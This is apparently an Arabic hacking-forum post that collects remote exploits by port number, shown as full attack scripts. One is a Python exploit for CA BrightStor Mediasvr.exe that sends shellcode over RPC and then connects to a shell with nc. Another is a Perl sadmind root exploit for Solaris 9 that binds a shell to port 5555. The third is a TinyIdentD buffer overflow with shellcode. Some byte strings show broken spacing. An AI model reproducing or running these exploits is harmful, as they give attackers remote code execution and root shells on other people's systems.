shellcode += "\x4f\x45\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x38\x 4e\x50\x4b\x54"
shellcode += "\x4b\x48\x4f\x45\x4e\x41\x41\x30\x4b\x4e\x43\x30\x 4e\x32\x4b\x58"
shellcode += "\x49\x48\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c\x 41\x53\x4b\x4d"
shellcode += "\x46\x56\x4b\x38\x43\x54\x42\x43\x4b\x58\x42\x44\x 4e\x30\x4b\x38"
shellcode += "\x42\x47\x4e\x41\x4d\x4a\x4b\x58\x42\x44\x4a\x30\x 50\x55\x4a\x56"
shellcode += "\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x 48\x4d\x48\x36"
shellcode += "\x43\x45\x48\x56\x4a\x46\x43\x53\x44\x33\x4a\x46\x 47\x37\x43\x57"
shellcode += "\x44\x33\x4f\x35\x46\x35\x4f\x4f\x42\x4d\x4a\x36\x 4b\x4c\x4d\x4e"
shellcode += "\x4e\x4f\x4b\x53\x42\x45\x4f\x4f\x48\x4d\x4f\x35\x 49\x38\x45\x4e"
shellcode += "\x48\x46\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x35\x 4c\x36\x44\x30"
shellcode += "\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x 4d\x4a\x47\x35"
shellcode += "\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x55\x43\x45\x 43\x35\x43\x34"
shellcode += "\x43\x55\x43\x34\x43\x45\x4f\x4f\x42\x4d\x48\x46\x 4a\x36\x41\x41"
shellcode += "\x4e\x45\x48\x36\x43\x45\x49\x58\x41\x4e\x45\x39\x 4a\x56\x46\x4a"
shellcode += "\x4c\x31\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x 4c\x46\x42\x31"
shellcode += "\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x 4d\x4a\x50\x42"
shellcode += "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x35\x 4f\x4f\x42\x4d"
shellcode += "\x4a\x36\x45\x4e\x49\x54\x48\x58\x49\x44\x47\x55\x 4f\x4f\x48\x4d"
shellcode += "\x42\x55\x46\x35\x46\x35\x45\x35\x4f\x4f\x42\x4d\x 43\x39\x4a\x56"
shellcode += "\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x45\x4f\x4f\x 48\x4d\x45\x45"
shellcode += "\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x56\x48\x36\x 4a\x46\x43\x46"
shellcode += "\x4d\x46\x49\x58\x45\x4e\x4c\x56\x42\x35\x49\x55\x 49\x52\x4e\x4c"
shellcode += "\x49\x38\x47\x4e\x4c\x56\x46\x54\x49\x58\x44\x4e\x 41\x53\x42\x4c"
shellcode += "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x 44\x34\x4e\x32"
shellcode += "\x43\x49\x4d\x48\x4c\x47\x4a\x33\x4b\x4a\x4b\x4a\x 4b\x4a\x4a\x36"
shellcode += "\x44\x47\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x 46\x34\x4f\x4f"
shellcode += "\x48\x4d\x4b\x45\x47\x55\x44\x55\x41\x45\x41\x35\x 41\x55\x4c\x36"
shellcode += "\x41\x30\x41\x35\x41\x55\x45\x45\x41\x45\x4f\x4f\x 42\x4d\x4a\x56"
shellcode += "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x 48\x4d\x4c\x56"
shellcode += "\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x38\x 47\x55\x4e\x4f"
shellcode += "\x43\x48\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x 4f\x4f\x42\x4d"
shellcode += "\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x43\x55\x 4f\x4f\x48\x4d"
shellcode += "\x4f\x4f\x42\x4d\x5a\x90"
#------------------------------------------------------------------------
#First Packet
rpc_packet1="\x80\x00\x80\x34\x65\xcf\x4c\x7b\x00\x00\x00\x00\x 00\x00\x00"
rpc_packet1+="\x02\x00\x06\x09\x7e\x00\x00\x00\x01"
#Prodcedure 191 and nulls
rpc_packet1+="\x00\x00\x00\xbf\x00\x00\x00\x00\x00\x00\x00\x00"
#Apparently these 4 bytes can be anything
rpc_packet1+="\x00\x00\x00\x00"
#This value is important for the location of the next address
rpc_packet1+="\x00\x00\x00\x00"
#Hardcoded Address loaded into ECX
rpc_packet1+="\x00\xae\x27\x64"
#Just spacing
rpc_packet1+="\x41\x42\x43\x44"
#Addess in memory, loaded into EAX and called with EAX+2Ch to get to shellcode
rpc_packet1+="\x3c\x27\xae\x00"
#jump to shellcode for packet 1
rpc_packet1+="\x6c\x27\xae\x00"
rpc_packet1+="\xeb\x01"
rpc_packet1+=shellcode
#------------------------------------------------------------------------
#Second Packet
rpc_packet2="\x80\x00\x80\x34\x65\xcf\x4c\x7b\x00\x00\x00\x00\x 00\x00\x00"
rpc_packet2+="\x02\x00\x06\x09\x7e\x00\x00\x00\x01"
#Procedure 191 and nulls
rpc_packet2+="\x00\x00\x00\xbf\x00\x00\x00\x00\x00\x00\x00\x00"
#Apparently these 4 bytes can be anything
rpc_packet2+="\x00\x00\x00\x00"
#This value is important for the location of the next address
rpc_packet2+="\x00\x00\x00\x00"
#Hardcoded Address loaded into ECX that seems to be hit after Mediasvr.exe has been
#restarted
rpc_packet2+="\x00\x9e\x27\x64"
#Just spacing
rpc_packet2+="\x41\x42\x43\x44"
#Addess stored in memory, loaded into EAX and called with EAX+2Ch to get to shellcode
rpc_packet2+="\x3c\x27\x9e\x00"
#jump to shellcode for packet 2
rpc_packet2+="\x6c\x27\x9e\x00"
rpc_packet2+="\xeb\x01"
rpc_packet2+=shellcode
# Portmap request for Mediasvr.exe
rpc_portmap_req="\x80\x00\x00\x38\x21\x84\xf7\xc9\x00\x00\x00\x00\x 00\x00\x00"
rpc_portmap_req+="\x02\x00\x01\x86\xa0\x00\x00\x00\x02\x00\x00\x00\x 03\x00\x00"
rpc_portmap_req+="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00"
rpc_portmap_req+="\x06\x09\x7e\x00\x00\x00\x01\x00\x00\x00\x06\x00\x 00\x00\x00"
#------------------------------------------------------------------------
def GetMediaSvrPort(target):
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((target,111))
sock.send(rpc_portmap_req)
rec = sock.recv(256)
sock.close()
port1 = rec[-4]
port2 = rec[-3]
port3 = rec[-2]
port4 = rec[-1]
port1 = hex(ord(port1))
port2 = hex(ord(port2))
port3 = hex(ord(port3))
port4 = hex(ord(port4))
port = '%02x%02x%02x%02x' % (int(port1,16),int(port2,16),int(port3,16),int(por t4,16))
port = int(port,16)
if port < 1100:
print '[+] Fresh Meat: Mediasvr.exe has not been restarted, Sending Packet 1 to: Target: %s Port: %s' %(target,port)
ExploitMediaSvr(target,port,1)
else:
print '[+] Mediasvr.exe has been restarted, Sending Packet 2 to: Target: %s Port: %s' % (target,port)
ExploitMediaSvr(target,port,2)
def ExploitMediaSvr(target,port,p):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target, port))
if p == 1:
sock.send(rpc_packet1)
elif p == 2:
sock.send(rpc_packet2)
sock.close ()
if __name__=="__main__":
try:
target = sys.argv[1]
except IndexError:
print '[+] Computer Associates (CA) Brightstor Backup Mediasvr.exe Remote Exploit'
print '[+] Author: Shirkdog'
print '[+] Usage: %s <target ip>\n' % sys.argv[0]
sys.exit(-1)
print '[+] Computer Associates (CA) Brightstor Backup Mediasvr.exe Remote Exploit'
print '[+] Author: Shirkdog'
GetMediaSvrPort(target)
print '[+] Exploit sent. Using nc to connect to: %s on port 4444' % target
time.sleep(3)
connect = "/usr/bin/nc -vn " + target + " 4444"
os.system(connect)
# [2007-03-29]
111 Solaris 9 [UltraSPARC] sadmind Remote Root Exploit
#!/usr/bin/perl
# holygrail2 #
#---------------------------------------------------------------------------------#
# SunOS 5.9 [UltraSPARC] sadmind Remote Root Exploit by KingCope in 2008 #
# #
# Most of work was shamelessy ripped from HD-Moore and RISE-Security exploits!!! #
# Bug found by RISE-Security. #
# Sparc exploit by KingCope [[email protected]] #
# Maybe I will extend this to Solaris 8/10/11 in futura ?? #
# thanks to alex,andi,adize ... #
# #
################################################## #################################
use strict;
use POSIX;
use IO::Socket;
use IO::Select;
print "holygrail2 vs. SunOS 5.9 sadmind\nby kcope in 2008\nbinds a shell to port 5555\n";
my $host = $ARGV[0];
if ($host eq "") {
print "usage: perl holygrail2.pl <address>\n";
exit(-1);
}
# solaris_sparc_bind - LPORT=5555 Size=232 Encoder=Sparc http://metasploit.com
my $payload =
"\x23\x32\xde\xd7\xa2\x14\x62\x6f\x20\xbf\xff\xff\x 20\xbf\xff\xff".
"\x7f\xff\xff\xff\xea\x03\xe0\x20\xaa\x9d\x40\x11\x ea\x23\xe0\x20".
"\xa2\x04\x40\x15\x81\xdb\xe0\x20\x12\xbf\xff\xfb\x 9e\x03\xe0\x04".
"\x57\x50\xfe\x68\xff\xb6\xde\x77\x69\xad\xde\x7c\x 01\xcb\x1e\x89".
"\xbb\xfc\xbe\x8f\x2b\xec\x9e\x8d\xce\x1c\xfe\x77\x 5f\xcc\xdf\x7f".
"\x8f\xce\xa0\x87\x11\x10\xdf\xf2\xf1\x04\xfe\x4f\x 11\x06\xbe\x5f".
"\x11\x6b\x7e\x6b\x03\x4f\x21\x83\xb7\x80\x01\xb3\x 35\xb0\x61\x5b".
"\xa8\x60\x42\x93\x1b\x83\x3d\x5b\x09\x94\x62\x9a\x af\x84\x42\x75".
"\x3e\x74\xa3\x8d\x91\x77\x1c\x75\x83\x62\x23\x8c\x 37\x80\xe3\x87".
"\xb5\xb4\xc3\x7d\x28\x65\x24\x89\x9b\xa6\x9b\x71\x 8f\xb8\xc4\x82".
"\x3d\xa9\x24\x8d\xd5\x6b\x84\x8c\x54\x7b\xe4\xb0\x c9\xab\xc4\xc4".
"\xf8\xf3\xfb\x28\x2d\x0f\xbb\x28\x59\x15\x04\xc3\x 40\x21\x5c\x49".
"\x22\x22\x7c\x03\x01\x41\xa2\x01\xd5\x75\xfb\xa5\x 47\x5a\x5b\xcd".
"\x87\xa6\x24\x3d\x97\xfa\xe4\x45\xd7\xde\xa4\x49\x 5a\x30\xfb\x8a".
"\xcb\xe0\xdb\xe4\xec\x01\x1b\xf4";
my $patchaddr = pack("N", 0xffbf83d8);
my $retaddr = pack("N", 0xffbf88e0);
sub nonblock {
my ($fd) = @_;
my $flags = fcntl($fd, F_GETFL,0);
fcntl($fd, F_SETFL, $flags|O_NONBLOCK);
}
sub rpc_read {
my ($s) = @_;
my $sel = IO::Select->new($s);
my $res;
my @fds = $sel->can_read(4);
foreach (@fds) { $res .= <$s>; }
return $res;
}
sub rpc_getport {
my ($target_host, $target_port, $prog, $vers) = @_;
my $s = rpc_socket($target_host, $target_port);
my $portmap_req =
pack("L", rand() * 0xffffffff) . # XID
"\x00\x00\x00\x00". # Call
"\x00\x00\x00\x02". # RPC Version
"\x00\x01\x86\xa0". # Program Number (PORTMAP)
"\x00\x00\x00\x02". # Program Version (2)
"\x00\x00\x00\x03". # Procedure (getport)
("\x00" x 16). # Credentials and Verifier
pack("N", $prog) .
pack("N", $vers).
pack("N", 0x11). # Protocol: UDP
pack("N", 0x00); # Port: 0
print $s $portmap_req;
my $r = rpc_read($s);
close ($s);
if (length($r) == 28)
{
my $prog_port = unpack("N",substr($r, 24, 4));
return($prog_port);
}
return undef;
}
sub rpc_socket {
my ($target_host, $target_port) = @_;
my $s = IO::Socket::INET->new
(
PeerAddr => $target_host,
PeerPort => $target_port,
Proto => "udp",
Type => SOCK_DGRAM
);
if (! $s)
{
print "\nError: could not create socket to target: $!\n";
exit(0);
}
select($s); $|++;
select(STDOUT); $|++;
nonblock($s);
return($s);
}
sub rpc_sadmin_expl {
my ($hostname, $command, $first) = @_;
my $packed_host = $hostname . ("\x00" x (59 - length($hostname)));
my $rpc =
pack("L", rand() * 0xffffffff) . # XID
"\x00\x00\x00\x00". # Call
"\x00\x00\x00\x02". # RPC Version
"\x00\x01\x87\x88". # Program Number (SADMIND)
"\x00\x00\x00\x0a". # Program Version (10)
"\x00\x00\x00\x01". # Procedure
"\x00\x00\x00\x01"; # Credentials (UNIX)
# Auth Length is filled in
# pad it up to multiples of 4
my $rpc_hostname = $hostname;
while (length($rpc_hostname) % 4 != 0) { $rpc_hostname .= "\x00" }
my $rpc_auth =
# Time Stamp
pack("N", time() + 20001) .
# Machine Name
pack("N", length($hostname)) . $rpc_hostname .
"\x00\x00\x00\x00". # UID = 0
"\x00\x00\x00\x00". # GID = 0
"\x00\x00\x00\x00"; # No Extra Groups
$rpc .= pack("N", length($rpc_auth)) . $rpc_auth . ("\x00" x 8);
my $fp = pack("N", 0xffbf9108);
my $buf1 = "\x90" x (2050-length($payload)-500) . $payload . "\x90\x90" . "\x90" x 500 . "CC" . $fp . $fp . $retaddr x 100;
if ($first eq 1) {
$buf1 = "\x90" x 50;
}
while (length($buf1) % 4 != 0) { $buf1 .= "\x00" }
my $header =
# Another Time Stamp
reverse(pack("L", time() + 20005)) .
"\x00\x07\x45\xdf".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04".
"\x7f\x00\x00\x01". # 127.0.0.1
"\x00\x01\x87\x88". # SADMIND
"\x00\x00\x00\x0a\x00\x00\x00\x04".
"\x7f\x00\x00\x01". # 127.0.0.1
"\x00\x01\x87\x88". # SADMIND
"\x00\x00\x00\x0a\x00\x00\x00\x11\x00\x00\x00\x1e".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00".
"\x00\x00\x00\x3b". $packed_host.
"\x00\x00\x00\x00\x06" . "system".
"\x00\x00\x00\x00\x00\x15". "../../../../../bin/sh". "\x00\x00\x00";
# Append Body Length ^-- Here
my $body =
"\x00\x00\x00\x0e". "ADM_FW_VERSION".
"\x00\x00\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00".
"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x08". "ADM_LANG".
"\x00\x00\x00\x09\x00\x00\x00\x02\x00\x00".
"\x00\x01". "C" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x0d". "ADM_REQUESTID".
"\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x12\x00\x 00\x00\x11".
"00009:000000000:0"."\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x09". "ADM_CLASS".
"\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x07".
"\x00\x00\x00\x06" . "system" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x0e" . "ADM_CLASS_VERS" .
"\x00\x00\x00\x00\x00\x09\x00\x00\x00\x04".
"\x00\x00\x00\x03". "2.1".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x0a" . "ADM_METHOD" .
"\x00\x00\x00\x00\x00\x09" . pack("N", length($buf1)+1) . pack("N", length($buf1)) . $buf1 .
"\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x08". "ADM_HOST" .
"\x00\x00\x00\x09\x00\x00\x00\x3c\x00\x00\x00\x3b".
$packed_host.
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x0f". "ADM_CLIENT_HOST".
"\x00\x00\x00\x00\x09".
pack("N", length($hostname) + 1) .
pack("N", length($hostname)) .
$rpc_hostname .
"\x00\x00\x00\x00". "\x00\x00\x00\x00".
"\x00\x00\x00\x11" . "ADM_CLIENT_DOMAIN".
"\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x01\x00\x 00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x11" . "ADM_TIMEOUT_PARMS".
"\x00\x00\x00\x00\x00".
"\x00\x09\x00\x00\x00\x1c".
"\x00\x00\x00\x1b" . "TTL=0 PTO=20 PCNT=2 PDLY=30".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x09" . "ADM_FENCE" .
"\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x 00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x01\x58\x00\x00\x00\x00\x 00\x00\x09\x00".
"\x00\x00\x03\x00\x00\x00\x02" . "-c" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x01\x59\x00".
"\x00\x00\x00\x00\x00\x09\x00\x00\x02\x01\x00\x00\x 02\x00".
$command . ("\x00" x (512 - length($command))).
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10".
"netmgt_endofargs";
my $res = $rpc . $header . pack("N", (length($body) + 4 + length($header)) - 330) . $body;
return($res);
}
$|=1;
my $portmap = "111";
for (my $i=1;$i<3;$i++) {
my $target_port = rpc_getport($host, $portmap, 100232, 10);
if (! $target_port)
{
print STDERR "Error: could not determine port used by sadmind\n";
exit(0);
}
my $s = rpc_socket($host, $target_port);
my $x = rpc_sadmin_expl("localhost", "foo", $i);
print $s $x;
my $r = rpc_read($s);
close ($s);
}
# [2008-10-19]
انتهينا من بورت 111
نبداء بـ بورت 113
113 TinyIdentD <= 2.2 Remote Buffer Overflow Exploit
#
#tinyidentd exploit code by
#thomas . pollet _at_ gmail . com
#bug by Maarten Boone
#
#usage: python exploit.py [target]
#
import socket,sys
#jmp into nop sled
payload = '\xeb\x20'
#ident crap
payload += ', 28 : USERID : UNIX : '
#nop sled
payload +='XXXX'
# jmp *%esi
payload += '\x77\x13\x83\x7c' #XP kernel32.dll
#payload += '\xb1\x63\xd9\x77' #W2K rpcrt4.dll
#metasploit alphanumeric shellcode calc.exe
shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x 49\x49\x49\x49"
shellcode += "\x49\x49\x48\x49\x49\x49\x49\x49\x49\x49\x49\x49\x 51\x5a\x6a\x44"
shellcode += "\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x54\x42\x32\x 41\x42\x32\x42"
shellcode += "\x41\x30\x42\x41\x58\x41\x50\x38\x41\x42\x75\x4a\x 49\x69\x6c\x4b"
shellcode += "\x58\x51\x54\x65\x50\x57\x70\x45\x50\x4e\x6b\x67\x 35\x35\x6c\x4e"
shellcode += "\x6b\x73\x4c\x55\x55\x71\x68\x67\x71\x68\x6f\x6c\x 4b\x52\x6f\x46"
shellcode += "\x78\x4e\x6b\x51\x4f\x71\x30\x74\x41\x7a\x4b\x30\x 49\x6c\x4b\x54"
shellcode += "\x74\x6e\x6b\x76\x61\x4a\x4e\x35\x61\x4b\x70\x6a\x 39\x4c\x6c\x4d"
shellcode += "\x54\x6b\x70\x30\x74\x54\x47\x6a\x61\x6a\x6a\x64\x 4d\x63\x31\x79"
shellcode += "\x52\x4a\x4b\x69\x64\x67\x4b\x32\x74\x65\x74\x66\x 64\x31\x65\x4a"
shellcode += "\x45\x6c\x4b\x71\x4f\x31\x34\x57\x71\x48\x6b\x52\x 46\x6e\x6b\x64"
shellcode += "\x4c\x52\x6b\x4e\x6b\x31\x4f\x77\x6c\x54\x41\x68\x 6b\x4c\x4b\x57"
shellcode += "\x6c\x6c\x4b\x57\x71\x4a\x4b\x4e\x69\x41\x4c\x65\x 74\x67\x74\x4a"
shellcode += "\x63\x75\x61\x4f\x30\x51\x74\x6c\x4b\x61\x50\x50\x 30\x4f\x75\x4f"
shellcode += "\x30\x32\x58\x64\x4c\x4c\x4b\x71\x50\x54\x4c\x4c\x 4b\x70\x70\x57"
shellcode += "\x6c\x4e\x4d\x6e\x6b\x73\x58\x35\x58\x4a\x4b\x36\x 69\x6c\x4b\x4d"
shellcode += "\x50\x4c\x70\x67\x70\x75\x50\x37\x70\x4c\x4b\x45\x 38\x35\x6c\x41"
shellcode += "\x4f\x57\x41\x68\x76\x53\x50\x30\x56\x6e\x69\x6b\x 48\x6f\x73\x6f"
shellcode += "\x30\x63\x4b\x62\x70\x30\x68\x58\x70\x6f\x7a\x57\x 74\x51\x4f\x45"
shellcode += "\x38\x6f\x68\x59\x6e\x4f\x7a\x66\x6e\x62\x77\x69\x 6f\x38\x67\x73"
shellcode += "\x53\x52\x41\x30\x6c\x71\x73\x64\x6e\x35\x35\x30\x 78\x70\x65\x45"
shellcode += "\x50\x44"
nopsize=523-len(payload)-len(shellcode)
nopsled=''
for i in range(nopsize):
nopsled+='\x90'
payload=payload.replace('XXXX',nopsled+shellcode)
try:
target=sys.argv[1]
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,113))
s.send(payload+'\n')
s.close()
print 'done'
except:
print 'usage : %s [target]'%sys.argv[0]
# [2007-05-14]
انتهينا من البورتات 105 و 110 و 111 و 113
ارجو حفظ الحقوق لجيوش الهكر
تحياتي